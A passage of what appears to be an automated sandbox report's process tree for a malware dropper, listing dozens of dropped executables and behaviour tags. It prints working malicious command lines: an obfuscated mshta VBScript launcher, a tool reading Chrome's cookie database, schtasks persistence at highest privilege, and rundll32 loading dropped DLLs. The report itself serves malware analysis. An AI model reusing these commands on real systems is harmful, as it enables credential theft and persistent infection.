C:\Users\Admin\Pictures\Adobe Films\rE0s2I5YsAkrhL0rwm2cMGMH.exe"C:\Users\Admin\Pictures\Adobe Films\rE0s2I5YsAkrhL0rwm2cMGMH.exe"6⤵
- Executes dropped EXE
PID:4620
-
-
C:\Users\Admin\Pictures\Adobe Films\JBqUVl0AavziUFk8mF9MBEFz.exe"C:\Users\Admin\Pictures\Adobe Films\JBqUVl0AavziUFk8mF9MBEFz.exe"6⤵PID:5084
-
-
C:\Users\Admin\Pictures\Adobe Films\prmkXyuwHbYwvV1WJVBf_POw.exe"C:\Users\Admin\Pictures\Adobe Films\prmkXyuwHbYwvV1WJVBf_POw.exe"6⤵PID:4224
-
-
C:\Users\Admin\Pictures\Adobe Films\4TVjmxhIVxePNNzIix5Vi_4t.exe"C:\Users\Admin\Pictures\Adobe Films\4TVjmxhIVxePNNzIix5Vi_4t.exe"6⤵PID:4116
-
-
C:\Users\Admin\Pictures\Adobe Films\3ahaQf1S8zP7X6nomLIIp_at.exe"C:\Users\Admin\Pictures\Adobe Films\3ahaQf1S8zP7X6nomLIIp_at.exe"6⤵PID:4104
-
-
C:\Users\Admin\Pictures\Adobe Films\sFngh8kJcCuAm8jysMbjEirC.exe"C:\Users\Admin\Pictures\Adobe Films\sFngh8kJcCuAm8jysMbjEirC.exe"6⤵PID:2740
-
-
C:\Users\Admin\Pictures\Adobe Films\ZG2ZCE1830yF8VzewG31eXYv.exe"C:\Users\Admin\Pictures\Adobe Films\ZG2ZCE1830yF8VzewG31eXYv.exe"6⤵PID:3984
-
-
C:\Users\Admin\Pictures\Adobe Films\1QpswqGMmr8jFRGiU0y1mg0u.exe"C:\Users\Admin\Pictures\Adobe Films\1QpswqGMmr8jFRGiU0y1mg0u.exe"6⤵PID:4504
-
-
C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe"C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe"6⤵PID:636
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )7⤵PID:3404
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mjhuWe53liGAnmDUfGFVJMRV.exe"C:\Users\Admin\Pictures\Adobe Films\mjhuWe53liGAnmDUfGFVJMRV.exe"6⤵PID:4360
-
-
C:\Users\Admin\Pictures\Adobe Films\20OlplmYlG0taOb1yrJZjz73.exe"C:\Users\Admin\Pictures\Adobe Films\20OlplmYlG0taOb1yrJZjz73.exe"6⤵PID:4012
-
-
C:\Users\Admin\Pictures\Adobe Films\lbYvRYMGQ18INDdWkYXV4QdW.exe"C:\Users\Admin\Pictures\Adobe Films\lbYvRYMGQ18INDdWkYXV4QdW.exe"6⤵PID:4640
-
-
C:\Users\Admin\Pictures\Adobe Films\RrfS1ik_AOuozA8Llq5ZZz_I.exe"C:\Users\Admin\Pictures\Adobe Films\RrfS1ik_AOuozA8Llq5ZZz_I.exe"6⤵PID:2612
-
-
C:\Users\Admin\Pictures\Adobe Films\EpuZ4h5YgR9ln1Xlr3Z3v9uI.exe"C:\Users\Admin\Pictures\Adobe Films\EpuZ4h5YgR9ln1Xlr3Z3v9uI.exe"6⤵PID:740
-
-
C:\Users\Admin\Pictures\Adobe Films\IhyB3byfgl4OUqLpgmN5iUNo.exe"C:\Users\Admin\Pictures\Adobe Films\IhyB3byfgl4OUqLpgmN5iUNo.exe"6⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5060
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6908
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EL5IT3BnDZzH_GPC3r1t_QJn.exe"C:\Users\Admin\Pictures\Adobe Films\EL5IT3BnDZzH_GPC3r1t_QJn.exe"6⤵PID:3220
-
-
C:\Users\Admin\Pictures\Adobe Films\vt7qlEx05_QwnSiQArra3aoV.exe"C:\Users\Admin\Pictures\Adobe Films\vt7qlEx05_QwnSiQArra3aoV.exe"6⤵PID:3728
-
-
C:\Users\Admin\Pictures\Adobe Films\eTTYqGuyYZnEOXHGZEZRQqzn.exe"C:\Users\Admin\Pictures\Adobe Films\eTTYqGuyYZnEOXHGZEZRQqzn.exe"6⤵PID:3248
-
-
C:\Users\Admin\Pictures\Adobe Films\6E3Tsy_pM65NL4yfoF1chK2w.exe"C:\Users\Admin\Pictures\Adobe Films\6E3Tsy_pM65NL4yfoF1chK2w.exe"6⤵PID:2268
-
-
C:\Users\Admin\Pictures\Adobe Films\zwSfPZG3jmRtfELIwYptCl0y.exe"C:\Users\Admin\Pictures\Adobe Films\zwSfPZG3jmRtfELIwYptCl0y.exe"6⤵PID:1480
-
-
C:\Users\Admin\Pictures\Adobe Films\L7faU3l3J6fuIjeMgI2x3Q_n.exe"C:\Users\Admin\Pictures\Adobe Films\L7faU3l3J6fuIjeMgI2x3Q_n.exe"6⤵PID:1296
-
-
C:\Users\Admin\Pictures\Adobe Films\1KvWy0EqEJ1MwUiG4pW47CXi.exe"C:\Users\Admin\Pictures\Adobe Films\1KvWy0EqEJ1MwUiG4pW47CXi.exe"6⤵PID:2208
-
-
C:\Users\Admin\Pictures\Adobe Films\UWyT7aYiHvA25MgSRQQK2QKb.exe"C:\Users\Admin\Pictures\Adobe Films\UWyT7aYiHvA25MgSRQQK2QKb.exe"6⤵PID:356
-
-
C:\Users\Admin\Pictures\Adobe Films\YmGxiEquxv5xodShM0zeXz36.exe"C:\Users\Admin\Pictures\Adobe Films\YmGxiEquxv5xodShM0zeXz36.exe"6⤵PID:3548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 4007⤵
- Program crash
PID:6020
-
-
-
C:\Users\Admin\Pictures\Adobe Films\US4tNNosJ4eBDUV4kOLvAspF.exe"C:\Users\Admin\Pictures\Adobe Films\US4tNNosJ4eBDUV4kOLvAspF.exe"6⤵PID:580
-
-
C:\Users\Admin\Pictures\Adobe Films\HgVOPkNaTWs2i5jmAAQX9vXj.exe"C:\Users\Admin\Pictures\Adobe Films\HgVOPkNaTWs2i5jmAAQX9vXj.exe"6⤵PID:4408
-
C:\Users\Public\Videos\hgfdfds.exe"C:\Users\Public\Videos\hgfdfds.exe"7⤵PID:6428
-
-
-
C:\Users\Admin\Pictures\Adobe Films\MsCFYxYPhSOdqzmDSY84r0OY.exe"C:\Users\Admin\Pictures\Adobe Films\MsCFYxYPhSOdqzmDSY84r0OY.exe"6⤵PID:5564
-
-
C:\Users\Admin\Pictures\Adobe Films\1DGl12ex8jVwHzTGfI9P0q3r.exe"C:\Users\Admin\Pictures\Adobe Films\1DGl12ex8jVwHzTGfI9P0q3r.exe"6⤵PID:5548
-
C:\Users\Admin\AppData\Local\Temp\7zS548F.tmp\Install.exe.\Install.exe7⤵PID:6872
-
C:\Users\Admin\AppData\Local\Temp\7zS9C76.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵PID:6628
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu077e2e75cb9448.exe4⤵PID:1828
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu077e2e75cb9448.exeThu077e2e75cb9448.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu077e2e75cb9448.exeC:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu077e2e75cb9448.exe6⤵
- Executes dropped EXE
PID:4560
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu07ee83176e465e.exe4⤵PID:1840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu073b8d0217a8b45b.exe4⤵PID:2368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu07d03cbff47c.exe4⤵PID:352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0786f9df93.exe4⤵PID:3664
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0786f9df93.exeThu0786f9df93.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3960
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0758285c76.exe"C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0758285c76.exe" -u1⤵
- Executes dropped EXE
PID:3548
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu073b8d0217a8b45b.exeThu073b8d0217a8b45b.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3124 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3124 -s 20282⤵
- Program crash
PID:4416
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu07ee83176e465e.exeThu07ee83176e465e.exe1⤵
- Executes dropped EXE
- Modifies registry class
PID:2108 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",2⤵PID:904
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",3⤵PID:3796
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",4⤵PID:3844
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",5⤵
- Loads dropped DLL
PID:4272
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu07d03cbff47c.exeThu07d03cbff47c.exe1⤵
- Executes dropped EXE
- Checks computer location settings
PID:1476 -
C:\Users\Admin\Pictures\Adobe Films\k195ieHUpMQS9BkZhyv36wqb.exe"C:\Users\Admin\Pictures\Adobe Films\k195ieHUpMQS9BkZhyv36wqb.exe"2⤵
- Executes dropped EXE
PID:4488
-
-
C:\Users\Admin\Pictures\Adobe Films\CRDSMHIqt6CbyEhVfbmL7kwQ.exe"C:\Users\Admin\Pictures\Adobe Films\CRDSMHIqt6CbyEhVfbmL7kwQ.exe"2⤵
- Executes dropped EXE
PID:4328
-
-
C:\Users\Admin\Pictures\Adobe Films\MTyK4gskUw6YvSYsi0YlrPO4.exe"C:\Users\Admin\Pictures\Adobe Films\MTyK4gskUw6YvSYsi0YlrPO4.exe"2⤵
- Executes dropped EXE
PID:4216
-
-
C:\Users\Admin\Pictures\Adobe Films\MFufgG4RPPu9X3FVrkyUMnoO.exe"C:\Users\Admin\Pictures\Adobe Films\MFufgG4RPPu9X3FVrkyUMnoO.exe"2⤵
- Executes dropped EXE
PID:4248
-
-
C:\Users\Admin\Pictures\Adobe Films\YNibrz7xz5HGgHLpNO730UWR.exe"C:\Users\Admin\Pictures\Adobe Films\YNibrz7xz5HGgHLpNO730UWR.exe"2⤵
- Executes dropped EXE
PID:5032 -
C:\Users\Admin\Documents\vJ_KcsnGDGg3OICQdhAIGSWU.exe"C:\Users\Admin\Documents\vJ_KcsnGDGg3OICQdhAIGSWU.exe"3⤵PID:6604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6964
-
-
-
C:\Users\Admin\Pictures\Adobe Films\oya9N3Li2HXd9xHDwHicTRmV.exe"C:\Users\Admin\Pictures\Adobe Films\oya9N3Li2HXd9xHDwHicTRmV.exe"2⤵
- Executes dropped EXE
PID:5020 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 4003⤵
- Drops file in Windows directory
- Program crash
PID:4532
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LMxXWBiVFvBjbrtWzyP_wXTD.exe"C:\Users\Admin\Pictures\Adobe Films\LMxXWBiVFvBjbrtWzyP_wXTD.exe"2⤵
- Executes dropped EXE
PID:4968
-
-
C:\Users\Admin\Pictures\Adobe Films\dWHIFENIefm39iLWFI430wCD.exe"C:\Users\Admin\Pictures\Adobe Films\dWHIFENIefm39iLWFI430wCD.exe"2⤵PID:5180
-
-
C:\Users\Admin\Pictures\Adobe Films\kauSYvOxhs4bucKiwTpG9FEm.exe"C:\Users\Admin\Pictures\Adobe Films\kauSYvOxhs4bucKiwTpG9FEm.exe"2⤵PID:5172
-
-
C:\Users\Admin\Pictures\Adobe Films\HaSt43Tpfu6j40yQLSCnEke5.exe"C:\Users\Admin\Pictures\Adobe Films\HaSt43Tpfu6j40yQLSCnEke5.exe"2⤵PID:5164
-
-
C:\Users\Admin\Pictures\Adobe Films\KlJr9BzBTX4owo4tNDsTxtDt.exe"C:\Users\Admin\Pictures\Adobe Films\KlJr9BzBTX4owo4tNDsTxtDt.exe"2⤵PID:5156
-
-
C:\Users\Admin\Pictures\Adobe Films\8dbNR2osJif2bJo0DpPafXxD.exe"C:\Users\Admin\Pictures\Adobe Films\8dbNR2osJif2bJo0DpPafXxD.exe"2⤵PID:5148
-
-
C:\Users\Admin\Pictures\Adobe Films\G0_O23EE8YK4TLVdhBztTHWc.exe"C:\Users\Admin\Pictures\Adobe Films\G0_O23EE8YK4TLVdhBztTHWc.exe"2⤵PID:5124
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\G0_O23EE8YK4TLVdhBztTHWc.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\G0_O23EE8YK4TLVdhBztTHWc.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )3⤵PID:5104
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xjTItW0ZndwXhquUjJos1KjN.exe"C:\Users\Admin\Pictures\Adobe Films\xjTItW0ZndwXhquUjJos1KjN.exe"2⤵PID:5140
-
-
C:\Users\Admin\Pictures\Adobe Films\CqgvXT2kwyo1wUVatfewrnKw.exe"C:\Users\Admin\Pictures\Adobe Films\CqgvXT2kwyo1wUVatfewrnKw.exe"2⤵PID:5132
-
-
C:\Users\Admin\Pictures\Adobe Films\gUHqUafUt1Xb4X_bn7tOvtLv.exe"C:\Users\Admin\Pictures\Adobe Films\gUHqUafUt1Xb4X_bn7tOvtLv.exe"2⤵PID:2980
-
-
C:\Users\Admin\Pictures\Adobe Films\hIoLrXGl3UzP5XvU6EuQ6P80.exe"C:\Users\Admin\Pictures\Adobe Films\hIoLrXGl3UzP5XvU6EuQ6P80.exe"2⤵PID:4820
-
-
C:\Users\Admin\Pictures\Adobe Films\OT4PI1r7cYKNWsqBfBQQ3OFQ.exe"C:\Users\Admin\Pictures\Adobe Films\OT4PI1r7cYKNWsqBfBQQ3OFQ.exe"2⤵PID:4608
-
-
C:\Users\Admin\Pictures\Adobe Films\ixLUOea2Zum3WxoP4kDApzCd.exe"C:\Users\Admin\Pictures\Adobe Films\ixLUOea2Zum3WxoP4kDApzCd.exe"2⤵PID:2724
-
-
C:\Users\Admin\Pictures\Adobe Films\rILukz326zki3mBkpjYJsI0H.exe"C:\Users\Admin\Pictures\Adobe Films\rILukz326zki3mBkpjYJsI0H.exe"2⤵PID:1240
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"3⤵PID:5260
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0FHXdSKBElAKEXYuHE4Ca5o6.exe"C:\Users\Admin\Pictures\Adobe Films\0FHXdSKBElAKEXYuHE4Ca5o6.exe"2⤵PID:1624
-
C:\Users\Admin\Pictures\Adobe Films\0FHXdSKBElAKEXYuHE4Ca5o6.exe"C:\Users\Admin\Pictures\Adobe Films\0FHXdSKBElAKEXYuHE4Ca5o6.exe"3⤵PID:5688
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ROkEcHyqM9wugNJVZUx5TCc2.exe"C:\Users\Admin\Pictures\Adobe Films\ROkEcHyqM9wugNJVZUx5TCc2.exe"2⤵PID:3740
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:4388
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:6836
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NayP3Co9ewgDWcmlDKKSvFRf.exe"C:\Users\Admin\Pictures\Adobe Films\NayP3Co9ewgDWcmlDKKSvFRf.exe"2⤵PID:2304
-
-
C:\Users\Admin\Pictures\Adobe Films\apYOn7hdhRpuEcR5vxmJXRUC.exe"C:\Users\Admin\Pictures\Adobe Films\apYOn7hdhRpuEcR5vxmJXRUC.exe"2⤵PID:4808
-
-
C:\Users\Admin\Pictures\Adobe Films\at1tT56ZEw6khpA7A4q6zwnS.exe"C:\Users\Admin\Pictures\Adobe Films\at1tT56ZEw6khpA7A4q6zwnS.exe"2⤵PID:808
-
-
C:\Users\Admin\Pictures\Adobe Films\McmOldutr6ESC0t6rySGG0e4.exe"C:\Users\Admin\Pictures\Adobe Films\McmOldutr6ESC0t6rySGG0e4.exe"2⤵PID:4580
-
-
C:\Users\Admin\Pictures\Adobe Films\eRCQFjJWQdWvTWygSXu7rQOD.exe"C:\Users\Admin\Pictures\Adobe Films\eRCQFjJWQdWvTWygSXu7rQOD.exe"2⤵PID:4600
-
-
C:\Users\Admin\Pictures\Adobe Films\Jd9_XFjy2ttTqCHqlH1D_YCk.exe"C:\Users\Admin\Pictures\Adobe Films\Jd9_XFjy2ttTqCHqlH1D_YCk.exe"2⤵PID:4616
-
-
C:\Users\Admin\Pictures\Adobe Films\SqQ8ygn564C0k1vzTWBGU9sX.exe"C:\Users\Admin\Pictures\Adobe Films\SqQ8ygn564C0k1vzTWBGU9sX.exe"2⤵PID:4636
-
C:\Users\Public\Videos\hgfdfds.exe"C:\Users\Public\Videos\hgfdfds.exe"3⤵PID:6200
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bHN6Ql6Cyo4EpwtQtZSSXExR.exe"C:\Users\Admin\Pictures\Adobe Films\bHN6Ql6Cyo4EpwtQtZSSXExR.exe"2⤵PID:4800
-
-
C:\Users\Admin\Pictures\Adobe Films\1IFja7EGAndZb4NFhszwyHKg.exe"C:\Users\Admin\Pictures\Adobe Films\1IFja7EGAndZb4NFhszwyHKg.exe"2⤵PID:4356
-
-
C:\Users\Admin\Pictures\Adobe Films\3H3gQGyjmQQOSzZvrw4EFLRG.exe"C:\Users\Admin\Pictures\Adobe Films\3H3gQGyjmQQOSzZvrw4EFLRG.exe"2⤵PID:5572
-
-
C:\Users\Admin\Pictures\Adobe Films\dqrBQZYKPOjgJjivOAfAoeUP.exe"C:\Users\Admin\Pictures\Adobe Films\dqrBQZYKPOjgJjivOAfAoeUP.exe"2⤵PID:5556
-
-
C:\Users\Admin\Pictures\Adobe Films\_C7fsxXLStYasWjQIzMRW6B8.exe"C:\Users\Admin\Pictures\Adobe Films\_C7fsxXLStYasWjQIzMRW6B8.exe"2⤵PID:5852
-
C:\Users\Admin\AppData\Local\Temp\7zS5461.tmp\Install.exe.\Install.exe3⤵PID:6860
-
C:\Users\Admin\AppData\Local\Temp\7zS988E.tmp\Install.exe.\Install.exe /S /site_id "525403"4⤵PID:5536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-I2BPD.tmp\Thu0785d39bed3127.tmp"C:\Users\Admin\AppData\Local\Temp\is-I2BPD.tmp\Thu0785d39bed3127.tmp" /SL5="$6006A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3588 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exe"C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exe" /SILENT2⤵
- Executes dropped EXE
PID:2144 -
C:\Users\Admin\AppData\Local\Temp\is-7LMGJ.tmp\Thu0785d39bed3127.tmp"C:\Users\Admin\AppData\Local\Temp\is-7LMGJ.tmp\Thu0785d39bed3127.tmp" /SL5="$7006A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:8 -
C:\Users\Admin\AppData\Local\Temp\is-VF5K0.tmp\windllhost.exe"C:\Users\Admin\AppData\Local\Temp\is-VF5K0.tmp\windllhost.exe" 774⤵
- Executes dropped EXE
PID:4432
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3876 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
PID:3936
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5776